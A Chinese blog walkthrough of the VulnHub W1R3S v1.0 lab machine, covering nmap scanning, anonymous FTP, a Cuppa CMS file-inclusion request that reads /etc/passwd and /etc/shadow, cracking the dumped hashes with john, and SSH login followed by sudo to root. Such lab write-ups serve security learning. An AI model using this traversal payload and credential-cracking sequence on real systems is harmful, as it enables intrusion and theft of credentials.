当前位置: 首页 > news >正文

[vulnhub] w1r3s.v1.0

https://www.vulnhub.com/entry/w1r3s-101,220/

思路:红队笔记

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是133

    nmap -sP 192.168.75.0/24
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 09:09 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.133
    Host is up (0.00021s latency).
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00028s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 2.14 seconds
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.133
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 09:11 CST
    Nmap scan report for 192.168.75.133
    Host is up (0.0011s latency).
    Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    

    开放了 21,22,80,3306

  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p21,22,80,3306 192.168.75.133
    //
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 2.0.8 or later
    22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    

    vsftpd 可能可以使用匿名登陆,可能会有信息泄露,所以优先级高

    Apache版本是2.4.18

    MySql未经授权,所以未能获取到版本信息

    操作系统版本**Linux 3.10 - 4.11** 或 Linux 3.2 - 4.9

    主机名为 W1R3S.inc

  4. UDP扫描

    nmap -sU 192.168.75.133
    //
    无数据
    
  5. 扫描开放端口漏洞

    我如果不设置--script-timeout 30s 会一直卡在98.xx%

    nmap -script=vuln -p21,22,80,3306 --script-timeout 30s  192.168.75.133
    //
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |_  /wordpress/wp-login.php: Wordpress login page.
    3306/tcp open  mysql
    MAC Address: 00:0C:29:11:5B:7D (VMware)
    

    没有找到什么漏洞,可能是扫描时间过短的原因,这样子的话我们的优先级就是21→80→3306→22 ,因为ftp可能造成文件泄露。web发现了wordpress的登陆页面,也有机会获得进度

FTP渗透

  1. 尝试下ftp是否能进行匿名登陆

    ftp 192.168.75.133
    //
    Connected to 192.168.75.133.
    220 Welcome to W1R3S.inc FTP service.
    Name (192.168.75.133:root): anonymous
    331 Please specify the password.
    Password: 
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    

    230 Login successful 登陆成功,接着查找信息

  2. 把匿名用户能获取的所有文件下载下来,一共有五个文件

    01.txt 02.txt 03.txt employee-names.txt worktodo.txt

    查看内容

    cat *.txt      
    New FTP Server For W1R3S.inc
    #
    #
    #
    #
    01ec2d8fc11c493b25029fb1f47f39ce
    #
    #
    #
    #
    #
    SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
    ############################################
    ___________.__              __      __  ______________________   _________    .__               
    \__    ___/|  |__   ____   /  \    /  \/_   \______   \_____  \ /   _____/    |__| ____   ____  |    |   |  |  \_/ __ \  \   \/\/   / |   ||       _/ _(__  < \_____  \     |  |/    \_/ ___\ |    |   |   Y  \  ___/   \        /  |   ||    |   \/       \/        \    |  |   |  \  \___ |____|   |___|  /\___  >   \__/\  /   |___||____|_  /______  /_______  / /\ |__|___|  /\___  >\/     \/         \/                \/       \/        \/  \/         \/     \/ 
    The W1R3S.inc employee listNaomi.W - Manager
    Hector.A - IT Dept
    Joseph.G - Web Design
    Albert.O - Web Design
    Gina.L - Inventory
    Rico.D - Human Resourcesı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
    • New FTP Server For W1R3S.inc 指的应该是 新的W1R3S.inc 公司的ftp服务器 ,新的就表示可能存在漏洞

    • 01ec2d8fc11c493b25029fb1f47f39ce看着特征像是MD5,识别出来是:This is not a password

    • SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== 看着像是base64,识别出来是:It is easy, but not that easy..

    • 中间的Ascii艺术说的是The W1R3S.inc

    • 还有个职员表,不过只有姓名,在爆破时可能用的上

      Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources
      
    • 最后有两行翻转过来的字符串,大概是

      we have a lot of work to do, stop playtng around'.
      i don't think this is the way to root!
      
  3. 好像没用…

WEB渗透

  1. 访问 http://192.168.75.133/ ,页面是apache的默认页面,可能是刚安装完

  2. 爆破目录都有啥,我们知道的只有wordpress的登录页

     python .\dirsearch.py -u http://192.168.75.133///[10:14:57] Starting:
    [10:14:58] 403 -  300B  - /.ht_wsr.txt
    [10:14:58] 403 -  303B  - /.htaccess.bak1
    [10:14:58] 403 -  303B  - /.htaccess.orig
    [10:14:58] 403 -  305B  - /.htaccess.sample
    [10:14:58] 403 -  303B  - /.htaccess.save
    [10:14:58] 403 -  303B  - /.htaccess_orig
    [10:14:58] 403 -  304B  - /.htaccess_extra
    [10:14:58] 403 -  301B  - /.htaccess_sc
    [10:14:58] 403 -  301B  - /.htaccessOLD
    [10:14:58] 403 -  302B  - /.htaccessOLD2
    [10:14:58] 403 -  294B  - /.html
    [10:14:58] 403 -  293B  - /.htm
    [10:14:58] 403 -  303B  - /.htpasswd_test
    [10:14:58] 403 -  299B  - /.htpasswds
    [10:14:58] 403 -  300B  - /.httr-oauth
    [10:14:58] 403 -  293B  - /.php
    [10:14:58] 403 -  294B  - /.php3
    [10:15:00] 403 -  301B  - /.htaccessBAK
    [10:15:03] 301 -  324B  - /administrator  ->  http://192.168.75.133/administrator/
    [10:15:03] 302 -    7KB - /administrator/  ->  installation/
    [10:15:03] 302 -    7KB - /administrator/index.php  ->  installation/
    [10:15:10] 301 -  321B  - /javascript  ->  http://192.168.75.133/javascript/
    [10:15:16] 403 -  302B  - /server-status
    [10:15:16] 403 -  303B  - /server-status/
    [10:15:21] 301 -    0B  - /wordpress/  ->  http://localhost/wordpress/
    [10:15:21] 200 -    1KB - /wordpress/wp-login.php
    

    存在administrator文件夹和wordpress ,先去查看wordpress

  3. 来到wordpress登陆页面,输入之前的用户名,密码随便输,抓包尝试爆破,但是发现数据包host指向的是localhost ,也就是指向我们的127.0.0.1

    //数据包
    POST /wordpress/wp-login.php HTTP/1.1
    Host: localhost
    ....
    log=Naomi&pwd=123&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1
    

    应该是还没配置好,我们去administrator目录看看

  4. 跳转到访问administator目录跳转到/administrator/installation/ 是个CMS安装页面,也、页面的title显示的是Cuppa CMS ,经查阅是一个内容管理系统的项目

    在这里插入图片描述

    我们尝试next ,毕竟只有这一个交互,Database NamePasswordEmail都是空的

    在这里插入图片描述

    尝试输入Database Name = test,Password = test ,Email = test@tets.com ,点击next

    在这里插入图片描述

    数据表创建成功,不过管理员用户创建失败,并且交互只有一个back ,这块也走不下去了

  5. 想到Cuppa也是一个开源项目,我们去查阅一下有没有漏洞,因为我们不知道CMS版本,所以都可以尝试下

    • 经查阅法cuppa存在文件包含漏洞,并且很容易利用

      https://bugtoolz.com/post/cs132020723/

      /target/templates/default/html/windows/right.php 下存在一个$_POST['url'] ,提交可以访问任意文件

    • 访问并抓包/administrator/templates/default/html/windows/right.php 因为是在administator目录安装的

    • 抓到包后测试读取/etc/passwd ,记得修改包请求方法,默认访问时GET需要改成POST

      //req
      POST /administrator/templates/default/html/windows/right.php HTTP/1.1
      Host: 192.168.75.133
      ....
      url=../../	../../etc/passwd
      

      读取成功

      //res
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      sys:x:3:3:sys:/dev:/usr/sbin/nologin
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/usr/sbin/nologin
      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
      systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
      systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
      systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
      systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
      syslog:x:104:108::/home/syslog:/bin/false
      _apt:x:105:65534::/nonexistent:/bin/false
      messagebus:x:106:110::/var/run/dbus:/bin/false
      uuidd:x:107:111::/run/uuidd:/bin/false
      lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
      whoopsie:x:109:117::/nonexistent:/bin/false
      avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
      avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
      dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
      colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
      speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
      hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
      kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
      pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
      rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
      saned:x:119:127::/var/lib/saned:/bin/false
      usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
      w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
      sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
      ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
      mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
      
    • 能读取passwd我们就继续读取shadow文件

      root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
      daemon:*:17379:0:99999:7:::
      bin:*:17379:0:99999:7:::
      sys:*:17379:0:99999:7:::
      sync:*:17379:0:99999:7:::
      games:*:17379:0:99999:7:::
      man:*:17379:0:99999:7:::
      lp:*:17379:0:99999:7:::
      mail:*:17379:0:99999:7:::
      news:*:17379:0:99999:7:::
      uucp:*:17379:0:99999:7:::
      proxy:*:17379:0:99999:7:::
      www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
      backup:*:17379:0:99999:7:::
      list:*:17379:0:99999:7:::
      irc:*:17379:0:99999:7:::
      gnats:*:17379:0:99999:7:::
      nobody:*:17379:0:99999:7:::
      systemd-timesync:*:17379:0:99999:7:::
      systemd-network:*:17379:0:99999:7:::
      systemd-resolve:*:17379:0:99999:7:::
      systemd-bus-proxy:*:17379:0:99999:7:::
      syslog:*:17379:0:99999:7:::
      _apt:*:17379:0:99999:7:::
      messagebus:*:17379:0:99999:7:::
      uuidd:*:17379:0:99999:7:::
      lightdm:*:17379:0:99999:7:::
      whoopsie:*:17379:0:99999:7:::
      avahi-autoipd:*:17379:0:99999:7:::
      avahi:*:17379:0:99999:7:::
      dnsmasq:*:17379:0:99999:7:::
      colord:*:17379:0:99999:7:::
      speech-dispatcher:!:17379:0:99999:7:::
      hplip:*:17379:0:99999:7:::
      kernoops:*:17379:0:99999:7:::
      pulse:*:17379:0:99999:7:::
      rtkit:*:17379:0:99999:7:::
      saned:*:17379:0:99999:7:::
      usbmux:*:17379:0:99999:7:::
      w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
      sshd:*:17554:0:99999:7:::
      ftp:*:17554:0:99999:7:::
      mysql:!:17554:0:99999:7:::
      
  6. rootwww-dataw1r3s用户进行破解

    • 将内容保存为shadow.hash 传入到kali

      root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
      www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
      w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
      
    • 使用john破解

      john shadow.hash 
      //
      reated directory: /root/.john
      Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
      Use the "--format=HMAC-SHA256" option to force loading these as that type instead
      Using default input encoding: UTF-8
      Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
      Cost 1 (iteration count) is 5000 for all loaded hashes
      Will run 8 OpenMP threads
      Proceeding with single, rules:Single
      Press 'q' or Ctrl-C to abort, almost any other key for status
      www-data         (www-data)     
      Almost done: Processing the remaining buffered candidate passwords, if any.
      Proceeding with wordlist:/usr/share/john/password.lst
      computer         (w1r3s)     
      Proceeding with incremental:ASCII
      

      暂时破解出来了两个用户的密码,除了root的,权限看着应该是w1r3s的更高

  7. 使用ssh登录w1r3s 用户,并查看其权限

    • 登陆成功

      ssh w1r3s@192.168.75.133 
      //
      ----------------------
      Think this is the way?
      ----------------------
      Well,........possibly.
      ----------------------
      w1r3s@192.168.75.133's password: 
      Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage108 packages can be updated.
      6 updates are security updates......You made it huh?....
      Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
      w1r3s@W1R3S:~$ 
      
    • 查看权限

      w1r3s@W1R3S:~$ whoami
      w1r3s
      //
      w1r3s@W1R3S:~$ uname -a
      Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
      //
      w1r3s@W1R3S:~$ ip a
      1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
      2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:11:5b:7d brd ff:ff:ff:ff:ff:ffinet 192.168.75.133/24 brd 192.168.75.255 scope global dynamic ens33valid_lft 1134sec preferred_lft 1134secinet6 fe80::aae5:6c48:85ba:de8/64 scope link valid_lft forever preferred_lft forever
      // 直接进去root用户了
      w1r3s@W1R3S:~$ sudo -i
      root@W1R3S:
      //
      root@W1R3S:~# whoami
      root
      

      提权成功

  8. 读取flag.txt文件,登录root后就在当前目录下

    
    // flag.txt
    -----------------------------------------------------------------------------------------____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |\____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ -----------------------------------------------------------------------------------------.-----------------TTTT_-----_______/''''''''''(______O] ----------____  \______/]___...---'"""\_ --''   Q                               ___________@|'''                   ._   _______________=---------"""""""|                ..--''|   l L |_l   ||          ..--''      .  /-___j '   '|    ..--''           /  ,       '   '|--''                /           `    \L__'         \    --    '-.'.    /'-./----------------------------------------------------------------------------------------YOU HAVE COMPLETED THE__      __  ______________________   _________/  \    /  \/_   \______   \_____  \ /   _____/\   \/\/   / |   ||       _/ _(__  < \_____  \ \        /  |   ||    |   \/       \/        \\__/\  /   |___||____|_  /______  /_______  /.INC\/                \/       \/        \/        CHALLENGE, V 1.0
    ----------------------------------------------------------------------------------------CREATED BY SpecterWires----------------------------------------------------------------------------------------

相关文章:

[vulnhub] w1r3s.v1.0

https://www.vulnhub.com/entry/w1r3s-101,220/ 思路&#xff1a;红队笔记 主机发现端口扫描 使用nmap扫描网段类存活主机 因为靶机是我最后添加的&#xff0c;所以靶机IP是133 nmap -sP 192.168.75.0/24 // Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-20 09:09 CST…...

c#中的功能优势

装箱和拆箱 性能消耗的直接体现 int iterations 10000000; // 进行一千万次迭代Stopwatch stopwatch new Stopwatch();// 非装箱测试stopwatch.Start();for (int i 0; i < iterations; i){int x i; // 纯值类型操作&#xff0c;无装箱}stopwatch.Stop();Console.Writ…...

Windows系统设置定时任务,周期性执行.bat文件

通过.bat清除注册表项 在 Windows 系统中&#xff0c;.bat 文件&#xff08;批处理文件&#xff09;是一个包含一系列命令的文本文件。这些命令会被 Windows 命令解释器 (cmd.exe) 依次执行。 你可以把它想象成一个简单的程序&#xff0c;但它不像 C 或 Python 那样需要编译&a…...

xQTLs 共定位分析(XQTLbiolinks包)

XQTL 共定位分析 XQTLbiolinks 是一个端到端的生物信息学工具&#xff0c;由深圳湾实验室李磊研究团队开发&#xff0c;用于高效地分析公共或用户定制的个xQTLs数据。该软件提供了一个通过与 xQTLs 共定位分析进行疾病靶基因发现的流程&#xff0c;以检测易感基因和致病变异。…...

网络工程(学习记录)

day1创建Vlan Switch>enable Switch#configure terminal Switch(config)#hostname SW1 修改名称为SW1 SW1(config)# SW1(config)#vlan 10 创建vlan10 SW1(config-vlan)#vlan 20 SW1(config)#interface f0/1 进入接口f0…...

全志A133 android10 适配EC20 4G模块

一&#xff0c;移植适配 1. 驱动移植 代码路径&#xff1a;longan/kernel/linux-4.9/drivers/usb/serial/option.c diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c index 9f96dd2..2f25466 100644 --- a/drivers/usb/serial/option.cb/drivers/us…...

数据分析:Python语言网络图绘制

文章目录 介绍加载R包类别导入数据下载数据画图介绍 网络图是一种图形表示法,用于展示实体之间的关系。在不同的领域中,网络图有着不同的含义和用途:在生物学中,网络图可以用来表示生物分子之间的相互作用,如蛋白质相互作用网络。 加载R包 import pandas as pd import …...

使用ChatGPT引导批判性思维,提升论文的逻辑与说服力的全过程

学境思源&#xff0c;一键生成论文初稿&#xff1a; AcademicIdeas - 学境思源AI论文写作 批判性分析&#xff08;Critical Analysis&#xff09; 是论文写作中提升质量和说服力的重要工具。它不仅帮助作者深入理解和评价已有研究&#xff0c;还能指导作者在构建自己论点时更加…...

vue限定类型上传文件 最简单实践(单个可文件、可图片)

这个是为了文件导入弄的&#xff0c;内部运维人员使用的 目前还没做删除文件的交互 <el-uploadclass"upload-demo"ref"upload":before-upload"handleBeforeUpload"action"#"accept".xls,.xlsx":limit"1">&l…...

【GUI设计】基于图像分割和边缘算法的GUI系统(7),matlab实现

博主简介&#xff1a; 如需获取设计的完整源代码或者有matlab图像代码项目需求/合作&#xff0c;可联系主页个人简介提供的联系方式或者文末的二维码。 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 本次案例是基于图像分割和边缘算法的GUI系统…...

未来之窗VOS编程工具让你的工作效率翻倍———未来之窗行业应用跨平台架构

未来之窗编程工具概述 平板电脑/手机用于编程具有诸多优点。其便携性强&#xff0c;方便随时随地开展工作。触摸操作直观便捷&#xff0c;长续航能满足长时间需求&#xff0c;启动迅速。支持手写绘图&#xff0c;利于表达想法。能集成多种编程工具&#xff0c;还便于通过云服务…...

分布式数据库——HBase基本操作

启动HBase: 1.启动hadoop,进入hadoop的sbin中 cd /opt/hadoop/sbin/ 2.初始化namenode hdfs namenode -format 3.启动hdfs ./start-all.sh 4.启动hbase cd /opt/hbase/bin ./start-hbase.sh 5.使用jps查看进程 jps 以下图片则是hbase启动成功~ 运行HBase ./hbase sh…...

Go语言并发编程中的超时与取消机制解析

解锁Python编程的无限可能:《奇妙的Python》带你漫游代码世界 并发编程是Go语言的核心优势之一,而在实际应用中,超时和取消操作会频繁出现。超时机制能够帮助我们理解系统行为,防止系统因为某些任务执行过长而陷入困境。与此同时,取消操作则是应对超时的一种自然反应。此…...

Unity3D UIdocument如何改变层级详解

前言 在Unity3D中&#xff0c;UI文档的层级改变通常涉及UI元素的显示顺序&#xff0c;这是通过UGUI&#xff08;Unitys Graphical User Interface&#xff09;系统来实现的。以下是一篇关于如何在Unity3D中改变UI元素层级的详细解析&#xff0c;包括技术详解和代码实现。 对惹…...

Debian与Ubuntu:深入解读两大Linux发行版的历史与联系

Debian与Ubuntu&#xff1a;深入解读两大Linux发行版的历史与联系 引言 在开源操作系统的领域中&#xff0c;Debian和Ubuntu是两款备受瞩目的Linux发行版。它们不仅在技术上有着密切的联系&#xff0c;而且各自的发展历程和理念也对开源社区产生了深远的影响。本文将详细介绍…...

GPU服务器本地搭建Dify+xinference实现大模型应用

文章目录 前言一、显卡驱动配置1.检测显卡2.安装驱动 二、安装nvidia-docker二、安装Xinference1.拉取镜像2.运行Xinference3.模型部署 三、安装Dify1.下载源代码2.启动 Dify3.访问 Dify 四、Dify构建应用1.配置模型供应商2.聊天助手3.Agent 前言 本文使用的GPU服务器为UCloud…...

嵌入式程序设计经验 创建复位函数

在设计嵌入式系统重新时 需要考虑软复位的情况, 软复位时 很多变量都需要重置为初始值, 如果一个个去赋值 很麻烦, 下面是一个简单的办法 主要是对结构体 复位的方法: #include <stdint.h>typedef struct {uint8_t reg1;uint8_t reg2;uint8_t reg3; } StruSimuStat1…...

每天五分钟深度学习框架pytorch:交叉熵计算时的维度是什么?

本文重点 前面我们学习了pytorch中已经封装好的损失函数,已经封装好的损失函数有很多,但是我们并没有详细介绍,原因就是单独介绍损失函数可能难以理解,我们上一章节的目的是让大家先了解一下常见的损失函数,然后再之后的实际使用中遇到哪个损失函数,我们就使用哪个损失函…...

【Axure视频教程】跨页面控制中继器表格

今天教大家在Axure制作跨页面控制中继器表格的原型模板&#xff0c;我们可以在一个页面中通过交互&#xff0c;对另一个页面中的中继器进行控制&#xff0c;控制其显示的数据内容。那这个模板使用也很简单&#xff0c;复制粘贴按钮&#xff0c;在中继器表格里填写对应的数据&am…...

Android 利用OSMdroid开发GIS 添加 控件以及定位

部署看这个&#xff1a;Android 利用OSMdroid开发GIS-CSDN博客 添加控件&#xff0c;直接上源码 activity_main.xml&#xff1a; <?xml version"1.0" encoding"utf-8"?> <RelativeLayout xmlns:android"http://schemas.android.com/apk/…...

谷歌浏览器插件

项目中有时候会用到插件 sync-cookie-extension1.0.0&#xff1a;开发环境同步测试 cookie 至 localhost&#xff0c;便于本地请求服务携带 cookie 参考地址&#xff1a;https://juejin.cn/post/7139354571712757767 里面有源码下载下来&#xff0c;加在到扩展即可使用FeHelp…...

Unity3D中Gfx.WaitForPresent优化方案

前言 在Unity中&#xff0c;Gfx.WaitForPresent占用CPU过高通常表示主线程在等待GPU完成渲染&#xff08;即CPU被阻塞&#xff09;&#xff0c;这表明存在GPU瓶颈或垂直同步/帧率设置问题。以下是系统的优化方案&#xff1a; 对惹&#xff0c;这里有一个游戏开发交流小组&…...

线程与协程

1. 线程与协程 1.1. “函数调用级别”的切换、上下文切换 1. 函数调用级别的切换 “函数调用级别的切换”是指&#xff1a;像函数调用/返回一样轻量地完成任务切换。 举例说明&#xff1a; 当你在程序中写一个函数调用&#xff1a; funcA() 然后 funcA 执行完后返回&…...

k8s业务程序联调工具-KtConnect

概述 原理 工具作用是建立了一个从本地到集群的单向VPN&#xff0c;根据VPN原理&#xff0c;打通两个内网必然需要借助一个公共中继节点&#xff0c;ktconnect工具巧妙的利用k8s原生的portforward能力&#xff0c;简化了建立连接的过程&#xff0c;apiserver间接起到了中继节…...

聊一聊接口测试的意义有哪些?

目录 一、隔离性 & 早期测试 二、保障系统集成质量 三、验证业务逻辑的核心层 四、提升测试效率与覆盖度 五、系统稳定性的守护者 六、驱动团队协作与契约管理 七、性能与扩展性的前置评估 八、持续交付的核心支撑 接口测试的意义可以从四个维度展开&#xff0c;首…...

保姆级教程:在无网络无显卡的Windows电脑的vscode本地部署deepseek

文章目录 1 前言2 部署流程2.1 准备工作2.2 Ollama2.2.1 使用有网络的电脑下载Ollama2.2.2 安装Ollama&#xff08;有网络的电脑&#xff09;2.2.3 安装Ollama&#xff08;无网络的电脑&#xff09;2.2.4 安装验证2.2.5 修改大模型安装位置2.2.6 下载Deepseek模型 2.3 将deepse…...

JVM 内存结构 详解

内存结构 运行时数据区&#xff1a; Java虚拟机在运行Java程序过程中管理的内存区域。 程序计数器&#xff1a; ​ 线程私有&#xff0c;程序控制流的指示器&#xff0c;分支、循环、跳转、异常处理、线程恢复等基础功能都依赖这个计数器完成。 ​ 每个线程都有一个程序计数…...

人机融合智能 | “人智交互”跨学科新领域

本文系统地提出基于“以人为中心AI(HCAI)”理念的人-人工智能交互(人智交互)这一跨学科新领域及框架,定义人智交互领域的理念、基本理论和关键问题、方法、开发流程和参与团队等,阐述提出人智交互新领域的意义。然后,提出人智交互研究的三种新范式取向以及它们的意义。最后,总结…...

(一)单例模式

一、前言 单例模式属于六大创建型模式,即在软件设计过程中,主要关注创建对象的结果,并不关心创建对象的过程及细节。创建型设计模式将类对象的实例化过程进行抽象化接口设计,从而隐藏了类对象的实例是如何被创建的,封装了软件系统使用的具体对象类型。 六大创建型模式包括…...

android RelativeLayout布局

<?xml version"1.0" encoding"utf-8"?> <RelativeLayout xmlns:android"http://schemas.android.com/apk/res/android"android:layout_width"match_parent"android:layout_height"match_parent"android:gravity&…...